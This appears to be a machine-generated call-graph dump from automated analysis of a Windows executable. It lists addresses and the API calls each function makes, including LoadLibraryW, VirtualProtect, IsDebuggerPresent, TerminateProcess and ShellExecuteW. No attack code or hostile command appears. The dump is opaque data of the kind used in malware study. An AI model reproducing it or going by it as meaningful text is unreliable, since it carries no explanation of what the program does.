API calls __wcstombs_l_helper 84957->84965 84961->84950 84961->84951 84962->84955 84963->84961 84964->84953 84965->84956 84966->84947 84968->84947 84969->84956 84971 41ac02 84970->84971 84972 41abfd 84970->84972 84979 417f23 67 API calls __getptd_noexit 84971->84979 84972->84971 84976 41ac22 84972->84976 84974 41ac07 84980 417ebb 6 API calls 2 library calls 84974->84980 84978 410c99 84976->84978 84981 417f23 67 API calls __getptd_noexit 84976->84981 84978->84880 84979->84974 84981->84974 84983 4113f1 __wfsopen 84982->84983 84990 41181b 84983->84990 84989 411412 __wfsopen 84989->84891 85016 418407 84990->85016 84992 4113f6 84993 4112fa 84992->84993 85081 4169e9 TlsGetValue 84993->85081 84996 4169e9 __decode_pointer 6 API calls 84997 41131e 84996->84997 85007 4113a1 84997->85007 85091 4170e7 68 API calls 5 library calls 84997->85091 84999 41133c 85001 411357 84999->85001 85002 411366 84999->85002 85012 411388 84999->85012 85000 41696e __encode_pointer 6 API calls 85003 411396 85000->85003 85092 417047 73 API calls _realloc 85001->85092 85006 411360 85002->85006 85002->85007 85004 41696e __encode_pointer 6 API calls 85003->85004 85004->85007 85006->85002 85009 41137c 85006->85009 85093 417047 73 API calls _realloc 85006->85093 85013 41141b 85007->85013 85094 41696e TlsGetValue 85009->85094 85010 411376 85010->85007 85010->85009 85012->85000 85106 411824 85013->85106 85017 41841c 85016->85017 85018 41842f EnterCriticalSection 85016->85018 85023 418344 85017->85023 85018->84992 85020 418422 85020->85018 85051 4117af 67 API calls 3 library calls 85020->85051 85022 41842e 85022->85018 85024 418350 __wfsopen 85023->85024 85025 418360 85024->85025 85026 418378 85024->85026 85052 418252 67 API calls 2 library calls 85025->85052 85034 418386 __wfsopen 85026->85034 85055 416fb6 85026->85055 85029 418365 85053 4180a7 67 API calls 7 library calls 85029->85053 85032 4183a7 85037 418407 __lock 67 API calls 85032->85037 85033 418398 85061 417f23 67 API calls __getptd_noexit 85033->85061 85034->85020 85035 41836c 85054 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 85035->85054 85039 4183ae 85037->85039 85041 4183e2 85039->85041 85042 4183b6 85039->85042 85043 413a88 __getptd_noexit 67 API calls 85041->85043 85062 4189e6 InitializeCriticalSectionAndSpinCount __wfsopen 85042->85062 85045 4183d3 85043->85045 85077 4183fe LeaveCriticalSection _doexit 85045->85077 85046 4183c1 85046->85045 85063 413a88 85046->85063 85049 4183cd 85076 417f23 67 API calls __getptd_noexit 85049->85076 85051->85022 85052->85029 85053->85035 85058 416fbf 85055->85058 85056 4138ba _malloc 66 API calls 85056->85058 85057 416ff5 85057->85032 85057->85033 85058->85056 85058->85057 85059 416fd6 Sleep 85058->85059 85060 416feb 85059->85060 85060->85057 85060->85058 85061->85034 85062->85046 85065 413a94 __wfsopen 85063->85065 85064 413b0d __wfsopen __dosmaperr 85064->85049 85065->85064 85067 418407 __lock 65 API calls 85065->85067 85075 413ad3 85065->85075 85066 413ae8 RtlFreeHeap 85066->85064 85068 413afa 85066->85068 85072 413aab ___sbh_find_block 85067->85072 85080 417f23 67 API calls __getptd_noexit 85068->85080 85070 413aff GetLastError 85070->85064 85071 413ac5 85079 413ade LeaveCriticalSection _doexit 85071->85079 85072->85071 85078 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __cftoe2_l 85072->85078 85075->85064 85075->85066 85076->85045 85077->85034 85078->85071 85079->85075 85080->85070 85082 416a01 85081->85082 85083 416a22 GetModuleHandleW 85081->85083 85082->85083 85084 416a0b TlsGetValue 85082->85084 85085 416a32 85083->85085 85086 416a3d GetProcAddress 85083->85086 85088 416a16 85084->85088 85104 41177f Sleep GetModuleHandleW 85085->85104 85090 41130e 85086->85090 85088->85083 85088->85090 85089 416a38 85089->85086 85089->85090 85090->84996 85091->84999 85092->85006 85093->85010 85095 4169a7 GetModuleHandleW 85094->85095 85096 416986 85094->85096 85098 4169c2 GetProcAddress 85095->85098 85099 4169b7 85095->85099 85096->85095 85097 416990 TlsGetValue 85096->85097 85102 41699b 85097->85102 85100 41699f 85098->85100 85105 41177f Sleep GetModuleHandleW 85099->85105 85100->85012 85102->85095 85102->85100 85103 4169bd 85103->85098 85103->85100 85104->85089 85105->85103 85109 41832d LeaveCriticalSection 85106->85109 85108 411420 85108->84989 85109->85108 85110 409030 85124 409110 117 API calls 85110->85124 85112 42ceb6 85138 410ae0 VariantClear moneypunct 85112->85138 85114 40906e 85114->85112 85116 42cea9 85114->85116 85118 4090a4 85114->85118 85115 42cebf 85137 45e62e 116 API calls 3 library calls 85116->85137 85125 404160 85118->85125 85121 4090f0 moneypunct 85123 4090be moneypunct 85123->85121 85133 4092c0 85123->85133 85124->85114 85126 4092c0 VariantClear 85125->85126 85127 40416e 85126->85127 85139 404120 85127->85139 85129 40419b 85143 40efe0 85129->85143 85151 4734b7 85129->85151 85130 4041c6 85130->85112 85130->85123 85134 4092c8 moneypunct 85133->85134 85135 429db0 VariantClear 85134->85135 85136 4092d5 moneypunct 85134->85136 85135->85136 85136->85123 85137->85112 85138->85115 85140 40412e 85139->85140 85141 4092c0 VariantClear 85140->85141 85142 404138 85141->85142 85142->85129 85144 40eff5 CreateFileW 85143->85144 85145 4299bf 85143->85145 85147 40f017 85144->85147 85146 4299c4 CreateFileW 85145->85146 85145->85147 85146->85147 85148 4299ea 85146->85148 85147->85130 85193 40e0d0 SetFilePointerEx SetFilePointerEx 85148->85193 85150 4299f5 85150->85147 85194 453063 85151->85194 85154 473545 85198 463c42 85154->85198 85155 47350c 85157 4092c0 VariantClear 85155->85157 85162 473514 85157->85162 85158 473558 85159 47355c 85158->85159 85175 473595 85158->85175 85161 4092c0 VariantClear 85159->85161 85160 473616 85211 463d7e 85160->85211 85171 473564 85161->85171 85162->85130 85164 453063 111 API calls 85164->85175 85165 473622 85166 473697 85165->85166 85167 47362c 85165->85167 85243 457838 85166->85243 85170 4092c0 VariantClear 85167->85170 85173 473634 85170->85173 85171->85130 85173->85130 85174 473655 85177 4092c0 VariantClear 85174->85177 85175->85160 85175->85164 85175->85174 85255 462f5a 87 API calls __wcsicoll 85175->85255 85179 47365d 85177->85179 85179->85130 85180 4736b0 85256 45e62e 116 API calls 3 library calls 85180->85256 85181 4736c9 85257 40e7e0 76 API calls 85181->85257 85184 4736ba GetCurrentProcess TerminateProcess 85184->85181 85185 4736db 85190 4736ff 85185->85190 85258 40d030 76 API calls 85185->85258 85187 4736f1 85259 46b945 134 API calls 2 library calls 85187->85259 85192 473731 85190->85192 85260 40d030 76 API calls 85190->85260 85261 46b945 134 API calls 2 library calls 85190->85261 85192->85130 85193->85150 85195 45306e 85194->85195 85196 45307a 85194->85196 85195->85196 85262 452e2a 111 API calls 5 library calls 85195->85262 85196->85154 85196->85155 85263 45335b 85198->85263 85200 463c5d 85266 442c52 80 API calls _wcslen 85200->85266 85202 463c72 85210 463cac 85202->85210 85267 40c060 85202->85267 85207 463ca4 85273 40c740 85207->85273 85208 463cf7 85208->85158 85210->85208 85278 462f5a 87 API calls __wcsicoll 85210->85278 85212 453063 111 API calls 85211->85212 85213 463d99 85212->85213 85214 463de0 85213->85214 85215 463dca 85213->85215 85290 40c760 78 API calls 85214->85290 85289 453081 111 API calls 85215->85289 85218 463dd0 LoadLibraryW 85226 463e09 85218->85226 85219 463de7 85236 463e19 85219->85236 85291 40c760 78 API calls 85219->85291 85221 463dfb 85221->85236 85292 40c760 78 API calls 85221->85292 85222 463e3e 85224 463e4e 85222->85224 85225 463e7b 85222->85225 85293 40d500 75 API calls 85224->85293 85295 40c760 78 API calls 85225->85295 85226->85222 85226->85236 85229 463e82 GetProcAddress 85233 463e90 85229->85233 85230 463e57 85294 45efe7 77 API calls moneypunct 85230->85294 85232 463e62 GetProcAddress 85234 463e79 85232->85234 85233->85234 85233->85236 85234->85233 85296 403470 75 API calls _memcpy_s 85234->85296 85236->85165 85237 463eb4 85297 40d500 75 API calls 85237->85297 85239 463ebd 85298 45efe7 77 API calls moneypunct 85239->85298 85241 463ec8 GetProcAddress 85299 401330 moneypunct 85241->85299 85244 457a4c 85243->85244 85245 45785f _strcat moneypunct _wcslen _wcscpy 85243->85245 85251 410d40 85244->85251 85245->85244 85246 443576 78 API calls 85245->85246 85247 40c760 78 API calls 85245->85247 85248 4138ba 67 API calls _malloc 85245->85248 85249 453081 111 API calls 85245->85249 85300 40f580 85245->85300 85246->85245 85247->85245 85248->85245 85249->85245 85253 410d55 85251->85253 85252 410ded VirtualProtect 85254 410dbb 85252->85254 85253->85252 85253->85254 85254->85180 85254->85181 85255->85175 85256->85184 85257->85185 85258->85187 85259->85190 85260->85190 85261->85190 85262->85196 85279 402ae0 85263->85279 85265 453367 CharLowerBuffW 85265->85200 85266->85202 85268 41171a 75 API calls 85267->85268 85269 40c088 85268->85269 85270 41171a 75 API calls 85269->85270 85271 40c096 85270->85271 85272 4608ce 75 API calls _memcpy_s 85271->85272 85272->85207 85274 40c752 85273->85274 85275 40c747 85273->85275 85274->85210 85275->85274 85276 402ae0 75 API calls 85275->85276 85277 42a572 _memcpy_s 85276->85277 85277->85210 85278->85208 85280 42a06a 85279->85280 85281 402aef 85279->85281 85286 401380 85280->85286 85281->85265 85283 42a072 85284 41171a 75 API calls 85283->85284 85285 42a095 _memcpy_s 85284->85285 85285->85265 85287 41171a 75 API calls 85286->85287 85288 401387 85287->85288 85288->85283 85289->85218 85290->85219 85291->85221 85292->85226 85293->85230 85294->85232 85295->85229 85296->85237 85297->85239 85298->85241 85299->85236 85301 429440 85300->85301 85302 40f589 _wcslen 85300->85302 85303 40f58f WideCharToMultiByte 85302->85303 85304 40f5d8 85303->85304 85305 40f5ad 85303->85305 85304->85245 85306 41171a 75 API calls 85305->85306 85307 40f5bb WideCharToMultiByte 85306->85307 85307->85245 85308 4034b0 85309 4034b9 85308->85309 85310 4034bd 85308->85310 85311 41171a 75 API calls 85310->85311 85312 42a0ba 85310->85312 85313 4034fe _memcpy_s moneypunct 85311->85313 85314 40f110 RegOpenKeyExW 85315 40f13c RegQueryValueExW RegCloseKey 85314->85315 85316 40f15f 85314->85316 85315->85316 85317 416193 85354 41718c 85317->85354 85319 41619f GetStartupInfoW 85321 4161c2 85319->85321 85355 41aa31 HeapCreate 85321->85355 85323 416212 85357 416e29 GetModuleHandleW 85323->85357 85327 416223 __RTC_Initialize 85391 41b669 85327->85391 85330 416231 85331 41623d GetCommandLineW 85330->85331 85459 4117af 67 API calls 3 library calls 85330->85459 85406 42235f GetEnvironmentStringsW 85331->85406 85334 41623c 85334->85331 85335 41624c 85412 4222b1 GetModuleFileNameW 85335->85412 85337 416256 85340 416261 85337->85340 85460 4117af 67 API calls 3 library calls 85337->85460 85416 422082 85340->85416 85341 416272 85429 41186e 85341->85429 85345 416279 85347 416284 __wwincmdln 85345->85347 85462 4117af 67 API calls 3 library calls 85345->85462 85435 40d7f0 85347->85435 85350 4162b3 85464 411a4b 67 API calls _doexit 85350->85464 85353 4162b8 __wfsopen 85354->85319 85356 416206 85355->85356 85356->85323 85457 41616a 67 API calls 3 library calls 85356->85457 85358 416e44 85357->85358 85359 416e3d 85357->85359 85360 416fac 85358->85360 85361 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 85358->85361 85465 41177f Sleep GetModuleHandleW 85359->85465 85475 416ad5 70 API calls 2 library calls 85360->85475 85363 416e97 TlsAlloc 85361->85363 85367 416218 85363->85367 85368 416ee5 TlsSetValue 85363->85368 85365 416e43 85365->85358 85367->85327 85458 41616a 67 API calls 3 library calls 85367->85458 85368->85367 85369 416ef6 85368->85369 85466 411a69 6 API calls 4 library calls 85369->85466 85371 416efb 85372 41696e __encode_pointer 6 API calls 85371->85372 85373 416f06 85372->85373 85374 41696e __encode_pointer 6 API calls 85373->85374 85375 416f16 85374->85375 85376 41696e __encode_pointer 6 API calls 85375->85376 85377 416f26 85376->85377 85378 41696e __encode_pointer 6 API calls 85377->85378 85379 416f36 85378->85379 85467 41828b InitializeCriticalSectionAndSpinCount __mtinitlocknum 85379->85467 85381 416f43 85381->85360 85382 4169e9 __decode_pointer 6 API calls 85381->85382 85383 416f57 85382->85383 85383->85360 85468 416ffb 85383->85468 85386 4169e9 __decode_pointer 6 API calls 85387 416f8a 85386->85387 85387->85360 85388 416f91 85387->85388 85474 416b12 67 API calls 5 library calls 85388->85474 85390 416f99 GetCurrentThreadId 85390->85367 85494 41718c 85391->85494 85393 41b675 GetStartupInfoA 85394 416ffb __calloc_crt 67 API calls 85393->85394 85400 41b696 85394->85400 85395 41b8b4 __wfsopen 85395->85330 85396 41b831 GetStdHandle 85405 41b7fb 85396->85405 85397 41b896 SetHandleCount 85397->85395 85398 416ffb __calloc_crt 67 API calls 85398->85400 85399 41b843 GetFileType 85399->85405 85400->85395 85400->85398 85401 41b77e 85400->85401 85400->85405 85401->85395 85402 41b7a7 GetFileType 85401->85402 85401->85405 85495 4189e6 InitializeCriticalSectionAndSpinCount __wfsopen 85401->85495 85402->85401 85405->85395 85405->85396 85405->85397 85405->85399 85496 4189e6 InitializeCriticalSectionAndSpinCount __wfsopen 85405->85496 85407 422370 85406->85407 85408 422374 85406->85408 85407->85335 85409 416fb6 __malloc_crt 67 API calls 85408->85409 85410 422395 _memcpy_s 85409->85410 85411 42239c FreeEnvironmentStringsW 85410->85411 85411->85335 85413 4222e6 _wparse_cmdline 85412->85413 85414 416fb6 __malloc_crt 67 API calls 85413->85414 85415 422329 _wparse_cmdline 85413->85415 85414->85415 85415->85337 85418 42209a _wcslen 85416->85418 85421 416267 85416->85421 85417 416ffb __calloc_crt 67 API calls 85426 4220be _wcslen 85417->85426 85418->85417 85419 422123 85420 413a88 __getptd_noexit 67 API calls 85419->85420 85420->85421 85421->85341 85461 4117af 67 API calls 3 library calls 85421->85461 85422 416ffb __calloc_crt 67 API calls 85422->85426 85423 422149 85424 413a88 __getptd_noexit 67 API calls 85423->85424 85424->85421 85426->85419 85426->85421 85426->85422 85426->85423 85427 422108 85426->85427 85497 426349 67 API calls __wcstombs_l_helper 85426->85497 85427->85426 85498 417d93 10 API calls 3 library calls 85427->85498 85431 41187c __IsNonwritableInCurrentImage 85429->85431 85499 418486 85431->85499 85432 41189a __initterm_e 85433 411421 __cinit 74 API calls 85432->85433 85434 4118b9 __IsNonwritableInCurrentImage __initterm 85432->85434 85433->85434 85434->85345 85436 431bcb 85435->85436 85437 40d80c 85435->85437 85438 4092c0 VariantClear 85437->85438 85439 40d847 85438->85439 85503 40eb50 85439->85503 85442 40d877 85506 411ac6 67 API calls 4 library calls 85442->85506 85445 40d888 85507 411b24 67 API calls __wcstombs_l_helper 85445->85507 85447 40d891 85508 40f370 SystemParametersInfoW SystemParametersInfoW 85447->85508 85449 40d89f 85509 40d6d0 GetCurrentDirectoryW 85449->85509 85451 40d8a7 SystemParametersInfoW 85452 40d8cd 85451->85452 85453 4092c0 VariantClear 85452->85453 85454 40d8dd 85453->85454 85455 4092c0 VariantClear 85454->85455 85456 40d8e6 85455->85456 85456->85350 85463 411a1f 67 API calls _doexit 85456->85463 85457->85323 85458->85327 85459->85334 85460->85340 85461->85341 85462->85347 85463->85350 85464->85353 85465->85365 85466->85371 85467->85381 85471 417004 85468->85471 85470 416f70 85470->85360 85470->85386 85471->85470 85472 417022 Sleep 85471->85472 85476 422452 85471->85476 85473 417037 85472->85473 85473->85470 85473->85471 85474->85390 85475->85367 85477 42245e __wfsopen 85476->85477 85478 422476 85477->85478 85488 422495 _memset 85477->85488 85489 417f23 67 API calls __getptd_noexit 85478->85489 85480 42247b 85490 417ebb 6 API calls 2 library calls 85480->85490 85481 422507 HeapAlloc 85481->85488 85484 418407 __lock 66 API calls 85484->85488 85485 42248b __wfsopen 85485->85471 85488->85481 85488->85484 85488->85485 85491 41a74c 5 API calls 2 library calls 85488->85491 85492 42254e LeaveCriticalSection _doexit 85488->85492 85493 411afc 6 API calls __decode_pointer 85488->85493 85489->85480 85491->85488 85492->85488 85493->85488 85494->85393 85495->85401 85496->85405 85497->85426 85498->85427 85500 41848c 85499->85500 85501 41696e __encode_pointer 6 API calls 85500->85501 85502 4184a4 85500->85502 85501->85500 85502->85432 85547 40eb70 85503->85547 85506->85445 85507->85447 85508->85449 85551 401f80 85509->85551 85511 40d6f1 IsDebuggerPresent 85512 431a9d MessageBoxA 85511->85512 85513 40d6ff 85511->85513 85514 431ab6 85512->85514 85513->85514 85515 40d71f 85513->85515 85653 403e90 75 API calls 3 library calls 85514->85653 85621 40f3b0 85515->85621 85519 40d73a GetFullPathNameW 85651 401440 127 API calls _wcscat 85519->85651 85521 40d77a 85522 40d782 85521->85522 85523 431b09 SetCurrentDirectoryW 85521->85523 85524 40d78b 85522->85524 85654 43604b 6 API calls 85522->85654 85523->85522 85633 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 85524->85633 85527 431b28 85527->85524 85529 431b30 GetModuleFileNameW 85527->85529 85531 431ba4 GetForegroundWindow ShellExecuteW 85529->85531 85532 431b4c 85529->85532 85534 40d7c7 85531->85534 85655 401b70 85532->85655 85533 40d795 85540 40d7a8 85533->85540 85641 40e1e0 85533->85641 85538 40d7d1 SetCurrentDirectoryW 85534->85538 85538->85451 85540->85534 85652 401000 Shell_NotifyIconW _memset 85540->85652 85541 431b66 85662 40d3b0 75 API calls 2 library calls 85541->85662 85544 431b72 GetForegroundWindow ShellExecuteW 85545 431b9f 85544->85545 85545->85534 85546 40eba0 LoadLibraryA GetProcAddress 85546->85442 85548 40d86e 85547->85548 85549 40eb76 LoadLibraryA 85547->85549 85548->85442 85548->85546 85549->85548 85550 40eb87 GetProcAddress 85549->85550 85550->85548 85663 40e680 85551->85663 85555 401fa2 GetModuleFileNameW 85681 40ff90 85555->85681 85557 401fbd 85693 4107b0 85557->85693 85560 401b70 75 API calls 85561 401fe4 85560->85561 85696 4019e0 85561->85696 85563 401ff2 85564 4092c0 VariantClear 85563->85564 85565 402002 85564->85565 85566 401b70 75 API calls 85565->85566 85567 40201c 85566->85567 85568 4019e0 76 API calls 85567->85568 85569 40202c 85568->85569 85570 401b70 75 API calls 85569->85570 85571 40203c 85570->85571 85704 40c3e0 85571->85704 85573 40204d 85574 40c060 75 API calls 85573->85574 85575 402061 85574->85575 85722 401a70 85575->85722 85577 40206e 85729 4115d0 85577->85729 85580 42c174 85582 401a70 75 API calls 85580->85582 85581 402088 85583 4115d0 __wcsicoll 79 API calls 85581->85583 85584 42c189 85582->85584 85585 402093 85583->85585 85587 401a70 75 API calls 85584->85587 85585->85584 85586 40209e 85585->85586 85588 4115d0 __wcsicoll 79 API calls 85586->85588 85589 42c1a7 85587->85589 85590 4020a9 85588->85590 85591 42c1b0 GetModuleFileNameW 85589->85591 85590->85591 85592 4020b4 85590->85592 85594 401a70 75 API calls 85591->85594 85593 4115d0 __wcsicoll 79 API calls 85592->85593 85595 4020bf 85593->85595 85596 42c1e2 85594->85596 85597 402107 85595->85597 85602 401a70 75 API calls 85595->85602 85604 42c20a _wcscpy 85595->85604 85741 40df50 75 API calls 85596->85741 85600 402119 85597->85600 85597->85604 85599 42c1f1 85603 401a70 75 API calls 85599->85603 85601 42c243 85600->85601 85737 40e7e0 76 API calls 85600->85737 85606 4020e5 _wcscpy 85602->85606 85607 42c201 85603->85607 85608 401a70 75 API calls 85604->85608 85612 401a70 75 API calls 85606->85612 85607->85604 85616 402148 85608->85616 85609 402132 85738 40d030 76 API calls 85609->85738 85611 40213e 85613 4092c0 VariantClear 85611->85613 85612->85597 85613->85616 85614 402184 85618 4092c0 VariantClear 85614->85618 85616->85614 85619 401a70 75 API calls 85616->85619 85739 40d030 76 API calls 85616->85739 85740 40e640 76 API calls 85616->85740 85620 402196 moneypunct 85618->85620 85619->85616 85620->85511 85622 42ccf4 _memset 85621->85622 85623 40f3c9 85621->85623 85626 42cd05 GetOpenFileNameW 85622->85626 86423 40ffb0 76 API calls moneypunct 85623->86423 85625 40f3d2 86424 410130 SHGetMalloc 85625->86424 85626->85623 85628 40d732 85626->85628 85628->85519 85628->85521 85629 40f3d9 86429 410020 88 API calls __wcsicoll 85629->86429 85631 40f3e7 86430 40f400 85631->86430 85634 42b9d3 85633->85634 85635 41025a LoadImageW RegisterClassExW 85633->85635 86475 443e8f EnumResourceNamesW LoadImageW 85634->86475 86474 4102f0 7 API calls 85635->86474 85638 42b9da 85639 40d790 85640 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 85639->85640 85640->85533 85643 40e207 _memset 85641->85643 85642 40e262 85644 40e2a4 85642->85644 86498 43737d 84 API calls __wcsicoll 85642->86498 85643->85642 85645 42aa14 DestroyIcon 85643->85645 85647 40e2c0 Shell_NotifyIconW 85644->85647 85648 42aa50 Shell_NotifyIconW 85644->85648 85645->85642 86476 401be0 85647->86476 85650 40e2da 85650->85540 85651->85521 85652->85534 85653->85521 85654->85527 85656 401b76 _wcslen 85655->85656 85657 41171a 75 API calls 85656->85657 85660 401bc5 85656->85660 85658 401bad _memcpy_s 85657->85658 85659 41171a 75 API calls 85658->85659 85659->85660 85661 40d3b0 75 API calls 2 library calls 85660->85661 85661->85541 85662->85544 85664 40c060 75 API calls 85663->85664 85665 401f90 85664->85665 85666 402940 85665->85666 85667 40294a __write_nolock 85666->85667 85742 4021e0 85667->85742 85670 402972 85680 4029a4 85670->85680 85754 401cf0 85670->85754 85671 402ae0 75 API calls 85671->85680 85672 402a8c 85673 401b70 75 API calls 85672->85673 85679 402abe 85672->85679 85675 402ab3 85673->85675 85674 401b70 75 API calls 85674->85680 85758 40d970 75 API calls 2 library calls 85675->85758 85676 401cf0 75 API calls 85676->85680 85679->85555 85680->85671 85680->85672 85680->85674 85680->85676 85757 40d970 75 API calls 2 library calls 85680->85757 85760 40f5e0 85681->85760 85684 40ffa6 85684->85557 85686 42b6d8 85687 42b6e6 85686->85687 85816 434fe1 85686->85816 85689 413a88 __getptd_noexit 67 API calls 85687->85689 85690 42b6f5 85689->85690 85691 434fe1 106 API calls 85690->85691 85692 42b702 85691->85692 85692->85557 85694 41171a 75 API calls 85693->85694 85695 401fd6 85694->85695 85695->85560 85697 401a03 85696->85697 85701 4019e5 85696->85701 85698 401a1a 85697->85698 85697->85701 86412 404260 76 API calls 85698->86412 85700 4019ff 85700->85563 85701->85700 86411 404260 76 API calls 85701->86411 85702 401a26 85702->85563 85705 40c3e4 85704->85705 85706 40c42c 85704->85706 85707 40c3f0 85705->85707 85708 42a475 85705->85708 85709 42a422 85706->85709 85710 40c435 85706->85710 86413 4042f0 75 API calls __cinit 85707->86413 86418 453155 75 API calls 85708->86418 85712 42a427 85709->85712 85713 42a445 85709->85713 85714 40c441 85710->85714 85715 42a455 85710->85715 85721 40c3fb 85712->85721 86415 453155 75 API calls 85712->86415 86416 453155 75 API calls 85713->86416 86414 4042f0 75 API calls __cinit 85714->86414 86417 453155 75 API calls 85715->86417 85721->85573 85723 401a90 85722->85723 85724 401a77 85722->85724 85726 4021e0 75 API calls 85723->85726 85725 401a8d 85724->85725 86419 404080 75 API calls _memcpy_s 85724->86419 85725->85577 85728 401a9c 85726->85728 85728->85577 85730 4115e1 85729->85730 85731 411650 85729->85731 85736 40207d 85730->85736 86420 417f23 67 API calls __getptd_noexit 85730->86420 86422 4114bf 79 API calls 3 library calls 85731->86422 85734 4115ed 86421 417ebb 6 API calls 2 library calls 85734->86421 85736->85580 85736->85581 85737->85609 85738->85611 85739->85616 85740->85616 85741->85599 85743 42a598 85742->85743 85745 4021f1 _wcslen 85742->85745 85744 40c740 75 API calls 85743->85744 85748 42a5a2 85744->85748 85746 402205 85745->85746 85747 402226 85745->85747 85759 404020 75 API calls moneypunct 85746->85759 85750 401380 75 API calls 85747->85750 85752 40222d 85750->85752 85751 40220c _memcpy_s 85751->85670 85752->85748 85753 41171a 75 API calls 85752->85753 85753->85751 85755 402ae0 75 API calls 85754->85755 85756 401cf7 85755->85756 85756->85670 85757->85680 85758->85679 85759->85751 85761 40f580 77 API calls 85760->85761 85762 40f5f8 _strcat moneypunct 85761->85762 85820 40f6d0 85762->85820 85768 40f679 85769 42b2ee 85768->85769 85770 40f681 85768->85770 85849 4151b0 85769->85849 85836 414e94 85770->85836 85774 40f68b 85774->85684 85779 452574 85774->85779 85776 42b31d 85855 415484 85776->85855 85778 42b33d 85780 41557c _fseek 105 API calls 85779->85780 85781 4525df 85780->85781 86356 4523ce 85781->86356 85784 4525fc 85784->85686 85785 4151b0 __fread_nolock 81 API calls 85786 45261d 85785->85786 85787 4151b0 __fread_nolock 81 API calls 85786->85787 85788 45262e 85787->85788 85789 4151b0 __fread_nolock 81 API calls 85788->85789 85790 452649 85789->85790 85791 4151b0 __fread_nolock 81 API calls 85790->85791 85792 452666 85791->85792 85793 41557c _fseek 105 API calls 85792->85793 85794 452682 85793->85794 85795 4138ba _malloc 67 API calls 85794->85795 85796 45268e 85795->85796 85797 4138ba _malloc 67 API calls 85796->85797 85798 45269b 85797->85798 85799 4151b0 __fread_nolock 81 API calls 85798->85799 85800 4526ac 85799->85800 85801 44afdc GetSystemTimeAsFileTime 85800->85801 85802 4526bf 85801->85802 85803 4526d5 85802->85803 85804 4526fd 85802->85804 85805 413a88 __getptd_noexit 67 API calls 85803->85805 85806 452704 85804->85806 85807 45275b 85804->85807 85809 4526df 85805->85809 86362 44b195 85806->86362 85808 413a88 __getptd_noexit 67 API calls 85807->85808 85811 452759 85808->85811 85812 413a88 __getptd_noexit 67 API calls 85809->85812 85811->85686 85814 4526e8 85812->85814 85813 452753 85815 413a88 __getptd_noexit 67 API calls 85813->85815 85814->85686 85815->85811 85817 434feb 85816->85817 85819 434ff1 85816->85819 85818 414e94 __fcloseall 106 API calls 85817->85818 85818->85819 85819->85687 85821 40f6dd _strlen 85820->85821 85868 40f790 85821->85868 85824 414e06 85887 414d40 85824->85887 85826 40f666 85826->85769 85827 40f450 85826->85827 85831 40f45a _strcat _memcpy_s __write_nolock 85827->85831 85828 4151b0 __fread_nolock 81 API calls 85828->85831 85829 40f531 85829->85768 85831->85828 85831->85829 85834 42936d 85831->85834 85970 41557c 85831->85970 85832 41557c _fseek 105 API calls 85833 429394 85832->85833 85835 4151b0 __fread_nolock 81 API calls 85833->85835 85834->85832 85835->85829 85837 414ea0 __wfsopen 85836->85837 85838 414ed1 85837->85838 85839 414eb4 85837->85839 85841 415965 __lock_file 68 API calls 85838->85841 85846 414ec9 __wfsopen 85838->85846 86109 417f23 67 API calls __getptd_noexit 85839->86109 85843 414ee9 85841->85843 85842 414eb9 86110 417ebb 6 API calls 2 library calls 85842->86110 86093 414e1d 85843->86093 85846->85774 86178 41511a 85849->86178 85851 4151c8 85852 44afdc 85851->85852 86349 4431e0 85852->86349 85854 44affd 85854->85776 85856 415490 __wfsopen 85855->85856 85857 4154bb 85856->85857 85858 41549e 85856->85858 85859 415965 __lock_file 68 API calls 85857->85859 86353 417f23 67 API calls __getptd_noexit 85858->86353 85861 4154c3 85859->85861 85863 4152e7 __ftell_nolock 71 API calls 85861->85863 85862 4154a3 86354 417ebb 6 API calls 2 library calls 85862->86354 85865 4154cf 85863->85865 86355 4154e8 LeaveCriticalSection LeaveCriticalSection _fprintf 85865->86355 85867 4154b3 __wfsopen 85867->85778 85869 40f7ae _memset 85868->85869 85871 40f628 85869->85871 85872 415258 85869->85872 85871->85824 85873 415285 85872->85873 85874 415268 85872->85874 85873->85874 85875 41528c 85873->85875 85883 417f23 67 API calls __getptd_noexit 85874->85883 85885 41c551 103 API calls 13 library calls 85875->85885 85878 41526d 85884 417ebb 6 API calls 2 library calls 85878->85884 85879 4152b2 85881 41527d 85879->85881 85886 4191c9 101 API calls 6 library calls 85879->85886 85881->85869 85883->85878 85885->85879 85886->85881 85888 414d4c __wfsopen 85887->85888 85889 414d5f 85888->85889 85892 414d95 85888->85892 85939 417f23 67 API calls __getptd_noexit 85889->85939 85891 414d64 85940 417ebb 6 API calls 2 library calls 85891->85940 85906 41e28c 85892->85906 85895 414d9a 85896 414da1 85895->85896 85897 414dae 85895->85897 85941 417f23 67 API calls __getptd_noexit 85896->85941 85899 414dd6 85897->85899 85900 414db6 85897->85900 85924 41dfd8 85899->85924 85942 417f23 67 API calls __getptd_noexit 85900->85942 85903 414d74 __wfsopen @_EH4_CallFilterFunc@8 85903->85826 85907 41e298 __wfsopen 85906->85907 85908 418407 __lock 67 API calls 85907->85908 85914 41e2a6 85908->85914 85909 41e322 85911 416fb6 __malloc_crt 67 API calls 85909->85911 85913 41e32c 85911->85913 85912 41e3b0 __wfsopen 85912->85895 85921 41e31b 85913->85921 85949 4189e6 InitializeCriticalSectionAndSpinCount __wfsopen 85913->85949 85914->85909 85915 418344 __mtinitlocknum 67 API calls 85914->85915 85914->85921 85947 4159a6 68 API calls __lock 85914->85947 85948 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 85914->85948 85915->85914 85918 41e351 85919 41e35c 85918->85919 85920 41e36f EnterCriticalSection 85918->85920 85922 413a88 __getptd_noexit 67 API calls 85919->85922 85920->85921 85944 41e3bb 85921->85944 85922->85921 85925 41dffb __wopenfile 85924->85925 85926 41e015 85925->85926 85938 41e1e9 85925->85938 85956 4136bc 79 API calls 2 library calls 85925->85956 85954 417f23 67 API calls __getptd_noexit 85926->85954 85928 41e01a 85955 417ebb 6 API calls 2 library calls 85928->85955 85930 41e247 85951 425db0 85930->85951 85934 41e1e2 85934->85938 85957 4136bc 79 API calls 2 library calls 85934->85957 85936 41e201 85936->85938 85958 4136bc 79 API calls 2 library calls 85936->85958 85938->85926 85938->85930 85939->85891 85941->85903 85942->85903 85943 414dfc LeaveCriticalSection LeaveCriticalSection _fprintf 85943->85903 85950 41832d LeaveCriticalSection 85944->85950 85946 41e3c2 85946->85912 85947->85914 85948->85914 85949->85918 